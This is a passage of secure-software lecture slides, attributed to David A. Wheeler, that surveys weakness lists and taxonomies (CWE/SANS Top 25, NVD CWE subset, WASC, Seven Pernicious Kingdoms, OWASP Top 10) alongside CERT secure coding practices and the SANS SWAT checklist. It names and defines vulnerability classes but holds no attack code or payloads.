2011 CWE/SANS Top 25 Most
Dangerous Software Errors
Rank  CWE ID   Name
[21] CWE-307 Improper Restriction of Excessive Authentication Attempts
[22] CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
[23] CWE-134 Uncontrolled Format String
[24] CWE-190 Integer Overflow or Wraparound
[25] CWE-759 Use of a One-Way Hash without a Salt
59
NIST National Vulnerability
Database (NVD): CWE subset
Name – CWE-ID – Description
Authentication Issues – CWE-287 – Failure to properly authenticate users.
Credentials Management – CWE-255 – Failure to properly create, store, transmit, or
protect passwords and other credentials.
Permissions, Privileges, and Access Control – CWE-264 – Failure to enforce permissions
or other access restrictions for resources, or a privilege management problem.
Buffer Errors – CWE-119 – Buffer overflows and other buffer boundary errors in which a
program attempts to put more data in a buffer than the buffer can hold, or when a
program attempts to put data in a memory area outside of the boundaries of the buffer.
Cross-Site Request Forgery (CSRF) – CWE-352 – Failure to verify that the sender of a web
request actually intended to do so. CSRF attacks can be launched by sending a formatted
request to a victim, then tricking the victim into loading the request (often
automatically), which makes it appear that the request came from the victim. CSRF is
often associated with XSS, but it is a distinct issue.
Cross-Site Scripting (XSS) – CWE-79 – Failure of a site to validate, filter, or encode user
input before returning it to another user's web client.
60
NIST National Vulnerability
Database (NVD): CWE subset
Name – CWE-ID – Description
Cryptographic Issues – CWE-310 – An insecure algorithm or the inappropriate use of one;
an incorrect implementation of an algorithm that reduces security; the lack of encryption
(plaintext); also, weak key or certificate management, key disclosure, random number
generator problems.
Path Traversal – CWE-22 – When user-supplied input can contain ".." or similar characters
that are passed through to file access APIs, causing access to files outside of an intended
subdirectory.
Code Injection – CWE-94 – Causing a system to read an attacker-controlled file and
execute arbitrary code within that file. Includes PHP remote file inclusion, uploading of
files with executable extensions, insertion of code into executable files, and others.
Format String Vulnerability – CWE-134 – The use of attacker-controlled input as the
format string parameter in certain functions.
Configuration – CWE-16 – A general configuration problem that is not associated with
passwords or permissions.
Information Leak / Disclosure – CWE-200 – Exposure of system information, sensitive or
private information, fingerprinting, etc.
61
NIST National Vulnerability
Database (NVD): CWE subset
Name – CWE-ID – Description
Input Validation – CWE-20 – Failure to ensure that input contains well-formed, valid data
that conforms to the application's specifications. Note: this overlaps other categories like
XSS, Numeric Errors, and SQL Injection.
Numeric Errors – CWE-189 – Integer overflow, signedness, truncation, underflow, and
other errors that can occur when handling numbers.
OS Command Injections – CWE-78 – Allowing user-controlled input to be injected into
command lines that are created to invoke other programs, using system() or similar
functions.
Race Conditions – CWE-362 – The state of a resource can change between the time the
resource is checked to when it is accessed.
Resource Management Errors – CWE-399 – The software allows attackers to consume
excess resources, such as memory exhaustion from memory leaks, CPU consumption
from infinite loops, disk space consumption, etc.
SQL Injection – CWE-89 – When user input can be embedded into SQL statements
without proper filtering or quoting, leading to modification of query logic or execution of
SQL commands.
62
NIST National Vulnerability
Database (NVD): CWE subset
Name – CWE-ID – Description
Link Following – CWE-59 – Failure to protect against the use of symbolic or hard links
that can point to files that are not intended to be accessed by the application.
Other – No Mapping – NVD is only using a subset of CWE for mapping instead of the
entire CWE, and the weakness type is not covered by that subset.
Not in CWE – No Mapping – The weakness type is not covered in the version of CWE that
was used for mapping.
Insufficient Information – No Mapping – There is insufficient information about the issue
to classify it; details are unknown or unspecified.
Design Error – No Mapping – A vulnerability is characterized as a "Design error" if there
exist no errors in the implementation or configuration of a system, but the initial design
causes a vulnerability to exist.
Source: http://nvd.nist.gov/cwe.cfm
63
“A Software Flaw Taxonomy:
Aiming Tools At Security”
Source:
“A Software Flaw Taxonomy: Aiming Tools At Security”
Sam Weber, Paul A. Karger, Amit Paradkar
http://cwe.mitre.org/documents/sources/ASoftwareFlawTaxonomy-AimingToolsatSecurity%5BWeber,Karger,Paradkar%5D.pdf
64
Weakness Classes
(NSA Center for Assured Software)
Weakness class – Example CWEs
Authentication and Access Control – CWE-620: Unverified Password Change
Buffer Handling [not in Java] – CWE-121: Stack-based Buffer Overflow
Code Quality – CWE-561: Dead Code; CWE-676: Use of Potentially Dangerous Function
Control Flow Management – CWE-833: Deadlock
Encryption and Randomness – CWE-328: Reversible One-Way Hash
Error Handling – CWE-252: Unchecked Return Value
File Handling – CWE-23: Relative Path Traversal
Information Leaks – CWE-534: Information Exposure Through Debug Log Files
Initialization and Shutdown – CWE-415: Double Free
Injection – CWE-134: Uncontrolled Format String
Malicious Logic – CWE-506: Embedded Malicious Code
Number Handling – CWE-369: Divide by Zero
Pointer and Reference Handling – CWE-476: NULL Pointer Dereference
Source: http://samate.nist.gov/docs/CAS_2011_SA_Tool_Method.pdf
65
WASC Threat Classification v2.0
• Attacks
– Abuse of Functionality, Brute Force, Buffer Overflow, Content Spoofing,
Credential/Session Prediction, Cross-Site Scripting, Cross-Site Request
Forgery, Denial of Service, Fingerprinting, Format String, HTTP
Response Smuggling, HTTP Response Splitting, HTTP Request Smuggling,
HTTP Request Splitting, Integer Overflows, LDAP Injection, Mail
Command Injection, Null Byte Injection, OS Commanding, Path
Traversal, Predictable Resource Location, Remote File Inclusion (RFI),
Routing Detour, Session Fixation, SOAP Array Abuse, SSI Injection,
SQL Injection, URL Redirector Abuse, XPath Injection, XML Attribute
Blowup, XML External Entities, XML Entity Expansion, XML Injection,
XQuery Injection
• Weaknesses
– Application Misconfiguration, Directory Indexing, Improper Filesystem
Permissions, Improper Input Handling, Improper Output Handling,
Information Leakage, Insecure Indexing, Insufficient Anti-automation,
Insufficient Authentication, Insufficient Authorization, Insufficient
Password Recovery, Insufficient Process Validation, Insufficient Session
Expiration, Insufficient Transport Layer Protection, Server
Misconfiguration
Source: http://projects.webappsec.org/w/page/13246978/Threat%20Classification
66
Seven Pernicious Kingdoms
• Input Validation and Representation
• API Abuse
• Security Features
• Time and State
• Error Handling
• Code Quality
• Encapsulation
Source: Tsipenyuk, Chess, and McGraw,
“Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors”,
Proceedings SSATTM, 2005
67
Software SOAR 2014
(Wheeler & Moorthy)
1. Provide design and code* quality
2. Counter known vulnerabilities (CVEs)
   (incl. of obsolete subcomponents)
3. Ensure authentication and access control*
   a. Authentication Issues
   b. Credentials Management
   c. Permissions, Privileges, and Access Control
   d. Least Privilege
4. Counter unintentional-"like" weaknesses
   a. Buffer Handling*
   b. Injection* (SQL, command, etc.)
   c. Encryption and Randomness*
   d. File Handling*
   e. Information Leaks*
   f. Number Handling*
   g. Control flow management*
   h. Initialization and Shutdown [of resources/components]*
   i. Design Error
   j. System Element Isolation
   k. Error Handling* and Fault isolation
   l. Pointer and reference handling*
5. Counter intentional-"like"/malicious logic*
   a. Known malware
   b. Not known malware
6. Provide anti-tamper (confidentiality of algorithms for CPI) and ensure transparency
7. Counter development tool inserted weaknesses
8. Provide secure delivery
9. Provide secure configuration
10. Other (e.g., power)
Source: State-of-the-Art Resources (SOAR) for Software Vulnerability
Detection, Test, and Evaluation by David A. Wheeler & Rama S. Moorthy,
Institute for Defense Analyses Paper P-5061, July 2014
* maps to NSA Center for Assured Software (CAS) structure
68
Coding standards/guides
69
Coding standards/Style guides
• Most languages & widely-used frameworks have
at least 1 style guide in wide use
• Most guides focus more on readability & generic
quality – but some include security
• Security-specific guides include:
– SEI CERT coding standards
https://www.securecoding.cert.org/confluence/display/seccode/SEI+CERT+Coding+Standards
– OWASP Secure Coding Practices
https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide
70
Top 10 Secure Coding Practices
(CERT/SEI) (1)
Practice
Description
1. Validate input.
Validate input from all untrusted data sources. Proper input validation can eliminate the
vast majority of software vulnerabilities. Be suspicious of most external data sources,
including command line arguments, network interfaces, environmental variables, and user
controlled files [Seacord 05].
2. Heed compiler
warnings.
Compile code using the highest warning level available for your compiler and eliminate
warnings by modifying the code [C MSC00-A, C++ MSC00-A]. Use static and dynamic
analysis tools to detect and eliminate additional security flaws.
3. Architect and
design for security
policies.
Create a software architecture and design your software to implement and enforce
security policies. For example, if your system requires different privileges at different
times, consider dividing the system into distinct intercommunicating subsystems, each
with an appropriate privilege set.
4. Keep it simple.
Keep the design as simple and small as possible [Saltzer 74, Saltzer 75]. Complex designs
increase the likelihood that errors will be made in their implementation, configuration,
and use. Additionally, the effort required to achieve an appropriate level of assurance
increases dramatically as security mechanisms become more complex.
5. Default deny.
Base access decisions on permission rather than exclusion. This means that, by default,
access is denied and the protection scheme identifies conditions under which access is
permitted [Saltzer 74, Saltzer 75].
71
Top 10 Secure Coding Practices
(CERT/SEI) (2)
Practice
Description
6. Adhere to the
principle of least
privilege.
Every process should execute with the least set of privileges necessary to complete the job. Any
elevated permission should be held for a minimum time. This approach reduces the opportunities an
attacker has to execute arbitrary code with elevated privileges [Saltzer 74, Saltzer 75].
7. Sanitize data
sent to other
systems.
Sanitize all data passed to complex subsystems [C STR02-A] such as command shells, relational databases,
and commercial off-the-shelf (COTS) components. Attackers may be able to invoke unused functionality in
these components through the use of SQL, command, or other injection attacks. This is not necessarily an
input validation problem because the complex subsystem being invoked does not understand the context in
which the call is made. Because the calling process understands the context, it is responsible for sanitizing
the data before invoking the subsystem.
8. Practice defense
in depth.
Manage risk with multiple defensive strategies, so that if one layer of defense turns out to be inadequate,
another layer of defense can prevent a security flaw from becoming an exploitable vulnerability and/or limit
the consequences of a successful exploit. For example, combining secure programming techniques with
secure runtime environments should reduce the likelihood that vulnerabilities remaining in the code at
deployment time can be exploited in the operational environment [Seacord 05].
9. Use effective
quality assurance
techniques.
Good quality assurance techniques can be effective in identifying and eliminating vulnerabilities. Fuzz
testing, penetration testing, and source code audits should all be incorporated as part of an effective quality
assurance program. Independent security reviews can lead to more secure systems. External reviewers
bring an independent perspective; for example, in identifying and correcting invalid assumptions [Seacord
05].
10. Adopt a secure
coding standard.
Develop and/or apply a secure coding standard for your target development language and platform
72
DISA AppSec Dev STIG
• DISA “Application Security and Development
STIG”
– Used by Department of Defense (DOD)
• Contract language, e.g.:
– “(APP3540.1: CAT I) The Designer will ensure the
application is not vulnerable to SQL injection.”
• http://iase.disa.mil/stigs/a-z.html
73
SANS Securing Web Application
Technologies (SWAT) Checklist (1)
•
Error handling & logging
– Display generic error messages
– No unhandled exceptions
– Suppress framework generated
errors
– Log all authentication activities
– Log all privilege changes
– Log administrative activities
– Log access to sensitive data
– Do not log inappropriate data
– Store logs securely
•
Data protection
– Use SSL everywhere
– Disable HTTP access for all SSL
enabled resources
– Use the Strict-Transport-Security header
– Store user passwords using a strong,
iterative, salted hash
– Securely exchange encryption keys
– Disable weak SSL ciphers on servers
– Use valid SSL certificates from a
reputable CA
– Disable data caching using cache
control headers and autocomplete
– Limit the use and storage of sensitive
data
Source: https://software-security.sans.org/resources/swat
74
SANS Securing Web Application
Technologies (SWAT) Checklist (2)
•
Configuration and operations
– Establish a rigorous change
management process
– Define security requirements
– Conduct a design review
– Perform code reviews
– Perform security testing
– Harden the infrastructure
– Define an incident handling plan
– Educate the team on security
•
Authentication
– Don't hardcode credentials
– Develop a strong password reset
system
– Implement a strong password policy
– Implement account lockout against
brute force attacks
– Don't disclose too much information
in error messages
– Store database credentials securely
– Applications and Middleware should
run with minimal privileges
75
SANS Securing Web Application
Technologies (SWAT) Checklist (3)
•
Session management
– Ensure that session identifiers are
sufficiently random
– Regenerate session tokens
– Implement an idle session timeout
– Implement an absolute session
timeout
– Destroy sessions at any sign of
tampering
– Invalidate the session after logout
– Place a logout button on every page
– Use secure cookie attributes (i.e.
httponly and secure flags)
– Set the cookie domain and path
correctly
– Set the cookie expiration time
•
Input & output handling
– Conduct contextual output encoding
– Prefer whitelists over blacklists
– Use parameterized SQL queries
– Use tokens to prevent forged requests
– Set the encoding for your application
– Validate uploaded files
– Use the nosniff header for uploaded content
– Validate the source of input
– Use the X-Frame-Options header
– Use Content Security Policy (CSP) or X-XSS-Protection headers
76
SANS Securing Web Application
Technologies (SWAT) Checklist (4)
• Access control
– Apply access controls
checks consistently
– Apply the principle of
least privilege
– Don’t use direct object
references for access
control checks
– Don’t use unvalidated
forwards or redirects
77
Conclusions
• Be careful sending output back
– Escape metacharacters so not misinterpreted
• Web applications
– Beware of session fixation, XSS, XSRF
• Developing secure software is not just knowing &
countering common weaknesses
– Good design! Prevent, detect, and recover!
• Weakness lists can help remind/focus on biggest
problems, taxonomies help describe
– There are a number of common past mistakes – once
you know what they are, you can avoid them
78
Backup
79
OWASP Top 10 (2010)
Security Risk – Covered in class session on:
A1: Injection – Call out (SQL injection, shell injection)
A2: Cross-Site Scripting (XSS) – Design/Web application
A3: Broken Authentication and Session Management – Authentication
A4: Insecure Direct Object References – Design (least privilege)
A5: Cross-Site Request Forgery (CSRF) – Design/Web application
A6: Security Misconfiguration – Design
A7: Insecure Cryptographic Storage – Cryptography
A8: Failure to Restrict URL Access – Design (least privilege)/web application
A9: Insufficient Transport Layer Protection – Cryptography
A10: Unvalidated Redirects and Forwards – Design/Web application
80
Released under CC BY-SA 3.0
• This presentation is released under the Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) license
• You are free:
– to Share — to copy, distribute and transmit the work
– to Remix — to adapt the work
– to make commercial use of the work
• Under the following conditions:
– Attribution — You must attribute the work in the manner specified by the
author or licensor (but not in any way that suggests that they endorse you or
your use of the work)
– Share Alike — If you alter, transform, or build upon this work, you may
distribute the resulting work only under the same or similar license to this one
• These conditions can be waived by permission from the copyright holder
– dwheeler at dwheeler dot com
• Details at: http://creativecommons.org/licenses/by-sa/3.0/
• Attribute me as “David A. Wheeler”
81